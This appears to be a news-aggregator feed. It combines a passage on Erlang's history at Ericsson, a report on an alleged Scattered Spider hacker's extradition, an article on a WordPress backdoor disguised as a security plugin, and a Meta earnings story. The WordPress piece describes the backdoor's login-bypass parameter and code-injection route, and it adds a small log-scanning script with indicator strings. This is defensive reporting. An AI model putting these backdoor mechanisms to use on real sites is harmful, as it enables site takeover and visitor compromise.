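The third point, no back-tracking, is a property of the execution model rather than something a short sketch can show; Prolog, one of the candidate languages, is a well-known example of a language built around back-tracking.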
With the criteria defined, the team at Ericsson began narrowing down their list of potential languages. Three years later, in 1985/’86, their list had gone from over 20 languages to…
Zero
. Whilst certain languages fulfilled some of their criteria, none of them had everything the team wanted. The solution was therefore to develop their own language, combining desirable features from all the evaluated ones.
And thus, Erlang was born!
Early Development
Experiments with this new language began as early as 1987. By 1989, they had reconstructed about a tenth of the Ericsson MD-110 system using Erlang, as a proof of concept. And the results were staggering. Compared to the time needed to develop the same features with Ericsson’s then-standard tools, Erlang was faster by a factor of 3 to 25, depending on the feature concerned! On average, productivity increased by a factor of 8!
The Ericsson MD-110. Credit: Järnvägsmuseet
However, there were problems. This massive productivity increase factor was very controversial within Ericsson, and many theories were created to explain away the findings. Erlang’s late co-creator, Joe Armstrong, explained that:
“It seemed at the time that people disliked the idea that the effect could be due to having a better programming language, preferring to believe that it was due to some “smart programmer effect”. Eventually we downgraded the factor to a mere 3 because it sounded more credible than 8. The factor 3 was totally arbitrary, chosen to be sufficiently high to be impressive, and sufficiently low to be believable. In any case, it was significantly greater than one, no matter how you measured and no matter how you explained the facts away”.
— Joe Armstrong
1
And even this paled in comparison to the bigger problem. Whilst development proved to be faster, Erlang itself was far too slow. For Erlang to be viable, it had to become 40 times faster.
Nonetheless, the team
(which by the way was just 2 people at this point!)
knew they were onto something great. This was proven that same year at the SETSS conference in Bournemouth, where they had the chance to present Erlang to the world. Armstrong wrote in his paper that:
“I remember Mike, Robert and I having great fun asking the same question over and over again: ‘what happens if it fails?’ The answer we got was almost always a variant on ‘our model assumes no failures’. We seemed to be the only people in the world designing a system that could recover from software failures.”
1
They were in fact so confident that Armstrong goes on to say that
“At the Bournemouth conference everybody told us we were wrong […] but we left the conference feeling happy that the rest of the world was wrong and that we were right”.
1
Over the next 6 years, Erlang was improved and expanded greatly, speeding up the language significantly, and introducing many new features. When the team (which had by now grown to hundreds of people) wasn’t making vast technical improvements, they were busy marketing Erlang, and partnering up with companies. This included delivering their first copy of Erlang to Bellcore (now iconectiv) in 1990.
Then, in December of 1995, everything changed.
The Big Break
In December of 1995, a massive project at Ellemtel called AXE-N failed. Its failure was such that even Ericsson AB’s website quotes their staff magazine saying:
“People fainted at the meetings, some wept while others displayed no reaction at all; they appeared to be totally unmoved.”
2
The AXE-N, a switching system, was meant to be a hardware and software replacement for the older AXE10 systems, with the software developed in C++.
With this collapse, however, the door opened for Erlang, which was chosen to be the replacement programming language (whilst the hardware was re-used). The project received a new name, too, now dubbed the AXD. In his article for HOPL III, Joe Armstrong acknowledged that without this event, the language would never have left the Ericsson lab.
Instead, this became the largest Erlang project (most probably ever), employing over 60 Erlang developers. Additionally, all external marketing for the language was stopped, with focus being solidly redirected to internal development. By the launch of the AXD 301 switch in March of 1998, the system had 1.13 million lines of Erlang code (this figure grew to over 2.6 million across the AXD’s lifetime).
An AXD301 rack. Credit: carritech.com
But the number of lines of code isn’t, nor should it be, impressive by itself. What truly showed the potential of Erlang was the fact that out of the 60-person team of programmers, the majority came from industrial backgrounds, with no prior knowledge of concurrent or functional programming! Instead, most of them were taught Erlang by Armstrong and his colleagues.
Furthermore, Armstrong claimed that by conservative estimates, one line of Erlang corresponded to about five lines of C, meaning that a corresponding system in C would have had nearly 6 million lines of code at launch.
This is made all the more impressive by the fact that the AXD 301 had an observed nine-nines reliability: over the 20-year period in which the AXD 301 provided services, the services were online 99.9999999% of the time.
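To put that figure in perspective, here is a quick back-of-the-envelope check (my own arithmetic, not from the original article):

    # Nine nines of availability leaves well under a second of downtime
    # over two decades of service.
    SECONDS_PER_YEAR = 365.25 * 24 * 3600
    availability = 0.999999999  # "nine nines"
    downtime_s = 20 * SECONDS_PER_YEAR * (1 - availability)
    print(f"{downtime_s:.2f} seconds of downtime over 20 years")  # ~0.63 s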
Coupled with an estimated 4x increase in productivity during the development cycle, this meant that the project was by all measures wildly successful.
Downfall
The Erlang team, however, didn’t have much of a chance to celebrate. Even before the launch of the AXD 301 system, in February of 1998, Ericsson Radio Systems (a subsidiary of Ericsson) had banned the use of Erlang within the company, claiming amongst other things that the use of a proprietary language wasn’t beneficial. Many view this and other excuses as rather ‘flimsy’, which has given rise to a number of less-discussed theories on the
actual
reason for the ban…
Regardless, this effectively marked the end of Erlang within Ericsson as a whole. The team thus lobbied management to release the language under an open-source license (with much of the lobbying work being done by Jane Walerud). Eventually, management agreed, and Erlang was released into the wild in December of 1998.
Aftermath
With Erlang free to use, the majority of the original development team (understandably) resigned from the company, starting Bluetail AB, with Jane Walerud as the CEO. Just two years later, Bluetail was sold to Nortel Networks for $152 million. The feeling of victory didn’t last long, either, as the IT crash of the early 2000s came just half a year after the sale, leaving half the Bluetail team (un)employed at Nortel.
Closing Notes
If you found this interesting, I’d highly encourage you to read Joe Armstrong’s entire article. It’s a very interesting and far more detailed (and technical) recounting of Erlang’s development. Most of the information in this post comes from there, and from a lecture by
John Hughes
which I had the privilege of attending at Chalmers.
Alleged ‘Scattered Spider’ Member Extradited to U.S.
Krebs
krebsonsecurity.com
2025-04-30 22:54:59
A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hac...
A 23-year-old Scottish man thought to be a member of the prolific
Scattered Spider
cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege
Tyler Robert Buchanan
and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.
Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.
Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.
As
first reported
by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was
first reported
last week by
Bloomberg
.
Members of Scattered Spider have been
tied
to the 2023 ransomware attacks against
MGM
and
Caesars
casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.
Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on
SIM-swapping attacks
that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.
In August 2022, KrebsOnSecurity
reviewed data harvested in a months-long cybercrime campaign by Scattered Spider
involving countless SMS-based phishing attacks against employees at major corporations. The security firm
Group-IB
called them by a different name —
0ktapus
, because the group typically spoofed the identity provider
Okta
in their phishing messages to employees at targeted firms.
A Scattered Spider/0ktapus SMS phishing lure sent to Twilio employees in 2022.
The
complaint against Buchanan
(PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar
NameCheap
found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.
Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.
“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”
U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and
February 2023; 391 bitcoin is presently worth more than $26 million.
In November 2024, federal prosecutors in Los Angeles
unsealed criminal charges against Buchanan
and four other alleged Scattered Spider members, including
Ahmed Elbadawy
, 23, of College Station, Texas;
Joel Evans
, 25, of Jacksonville, North Carolina;
Evans Osiebo
, 20, of Dallas; and
Noah Urban
, 20, of Palm Coast, Florida. KrebsOnSecurity
reported last year
that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.
Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.
Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.
WordPress plugin disguised as a security tool injects backdoor
Bleeping Computer
www.bleepingcomputer.com
2025-04-30 22:05:46
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it. [...]...
A new malware campaign targeting WordPress sites employs a malicious plugin disguised as a security tool to trick users into installing and trusting it.
According to Wordfence researchers, the malware provides attackers with persistent access, remote code execution, and JavaScript injection. At the same time, it remains hidden from the plugin dashboard to evade detection.
Wordfence first discovered the malware during a site cleanup in late January 2025, where it found a modified 'wp-cron.php' file, which creates and programmatically activates a malicious plugin named 'WP-antymalwary-bot.php.'
Other plugin names used in the campaign include:
addons.php
wpconsole.php
wp-performance-booster.php
scr.php
If the plugin is deleted, wp-cron.php re-creates and reactivates it automatically on the next site visit.
Lacking server logs to help identify the exact infection chain, Wordfence hypothesizes the infection occurs via a compromised hosting account or FTP credentials.
Not much is known about the perpetrators, though the researchers noted that the command and control (C2) server is located in Cyprus, and there are traits similar to a
June 2024 supply chain attack
.
Once active on the server, the plugin performs a self-status check and then gives the attacker administrator access.
"The plugin provides immediate administrator access to threat actors via the emergency_login_all_admins function,"
explains Wordfence in its writeup
.
"This function utilizes the emergency_login GET parameter in order to allow attackers to obtain administrator access to the dashboard."
"If the correct cleartext password is provided, the function fetches all administrator user records from the database, picks the first one, and logs the attacker in as that user."
Next, the plugin registers an unauthenticated custom REST API route that allows the insertion of arbitrary PHP code into all active theme header.php files, clearing of plugin caches, and other commands processed via a POST parameter.
An updated version of the malware can also inject base64-decoded JavaScript into the site's <head> section, likely to serve visitors ads or spam, or to redirect them to unsafe sites.
Apart from file-based indicators like the listed plugins, website owners should scrutinize their 'wp-cron.php' and 'header.php' files for unexpected additions or modifications.
Access logs containing 'emergency_login,' 'check_plugin,' 'urlchange,' and 'key' should also serve as red flags, warranting further investigation.
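For a first triage pass, something as simple as the following sketch can surface those markers in an access log. This is my own illustration rather than Wordfence tooling; the log path and format are assumptions, and the bare 'key' parameter in particular will produce noise, so every match needs manual review.

    # Flag access-log lines containing request markers associated with
    # this campaign. Matches are leads for investigation, not proof of
    # compromise.
    import re
    from pathlib import Path

    INDICATORS = ["emergency_login", "check_plugin", "urlchange", "key="]
    LOG_PATH = Path("/var/log/apache2/access.log")  # hypothetical location

    pattern = re.compile("|".join(re.escape(m) for m in INDICATORS))

    for line_no, line in enumerate(LOG_PATH.read_text(errors="replace").splitlines(), start=1):
        if pattern.search(line):
            print(f"{LOG_PATH}:{line_no}: {line.strip()}")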
Meta’s quarterly earnings beat Wall Street expectations as its AI investments rise by billions
Guardian
www.theguardian.com
2025-04-30 21:50:05
‘We’ve had a strong start to an important year’, Zuckerberg said as company posts $42.35bn in revenue for first quarter Meta reported earnings on Wednesday, beating Wall Street’s expectations for yet another quarter even as it lavishes billions on artificial intelligence. Meta posted $42.32bn in rev...
Meta
reported earnings on Wednesday, beating Wall Street’s expectations for yet another quarter even as it lavishes billions on artificial intelligence.
Meta posted $42.32bn in revenue in the first quarter of 2025, beating both the high end of its own revenue guidance ($41.8bn) and Wall Street expectations of $41.38bn.
The company also reported $6.43 in earnings per share, beating Wall Street projections of $5.27. Shares jumped in after-hours trading.
“We’ve had a strong start to an important year, our community continues to grow and our business is performing very well,” said Meta’s chief executive,
Mark Zuckerberg
. “We’re making good progress on AI glasses and Meta AI, which now has almost 1bn monthly actives.”
Speaking on the investor call, Zuckerberg said the company was performing well and its platforms were growing, making it “well-positioned to navigate” any macroeconomic uncertainty.
“I continue to think this year is going to be a pivotal moment in our industry,” he said.
This continues Meta’s streak of beating Wall Street
expectations
over the past few quarters. However, it is unclear if it will be enough to quell investor concerns. Analysts were disappointed by the first-quarter revenue outlook Zuckerberg shared at the end of 2024. The company has also updated its spending outlook for the year, with plans to spend anywhere from $64bn to $72bn in capital expenditures, including the cost of building out AI infrastructure. That is up from the $65bn the company originally said it was expecting to spend in 2025. Total costs and expenditures for the first quarter were already at $24.76bn, a 9% increase compared with the year prior. Uncertainty over Donald Trump’s sweeping tariffs may yet roil ad markets, clouding the company’s financial outlook for coming quarters.
EMarketer
senior analyst Minda Smiley said the company’s “optimistic Q2 guidance signals that the company isn’t expecting any major dips in ad revenue” as a result of the tariffs, but that she doesn’t expect Meta to be spared from the downturn in the long term.
“On the one hand, the company stands to gain from economic instability. Advertisers will allocate more ad dollars to proven, sophisticated networks like Facebook and Instagram – all while pulling back spend on smaller social platforms – while they navigate uncertainty,” Smiley said. “On the other hand, a small but significant portion of Meta’s revenue comes from Chinese retailers like Temu and Shein advertising to US shoppers. That spend is starting to dry up as a result of trade and tariff change.”
Meta’s spending also continues to “weigh heavily on investors”, according to Debra Aho Williamson, the founder and chief analyst of Sonata Insights. “But Meta will resist directly monetizing AI this year, focusing instead on building AI usage among its app users, advertisers and developers using Llama,” said Williamson.
In the weeks leading up to the earnings report, Meta has had a mix of AI-related news including the launch of a standalone AI app that would serve as its ChatGPT competitor. But a
WSJ report
revealed that chatbots integrated into the company’s various products, including Facebook and Instagram, had been given the ability to perform “romantic role play” even with the platforms’ teen users. Executives at the company, which has repeatedly touted the nearly 1 billion users of its AI chatbots, also
admit
that many of those users access the chatbot through its hard-to-avoid takeover of the search bars of WhatsApp, Instagram and Facebook. The company has not detailed how many interactions with the chatbot, or how deep those interactions need to be, for a person to count as a user of the AI chatbot.
Paired with Meta’s
ongoing antitrust trial
– where the company faces claims that it built an illegal social media monopoly with its acquisitions of Instagram and WhatsApp – the uncertain AI future adds to the concerns some analysts have around Meta’s financials, despite how strong they may look on paper.
“Meta’s earnings call comes at a precarious time where the company’s future is literally being
debated in court
– the results of which could fundamentally alter the social media landscape,” said Forrester VP and research director
Mike Proulx
. “Meta is smart to direct more resources into improving Threads and Facebook since those could be the only two apps the company is left with. It’s also notable that Meta just laid off a number of employees in its Reality Labs division, which has been a continued and growing leaky bucket for Meta.”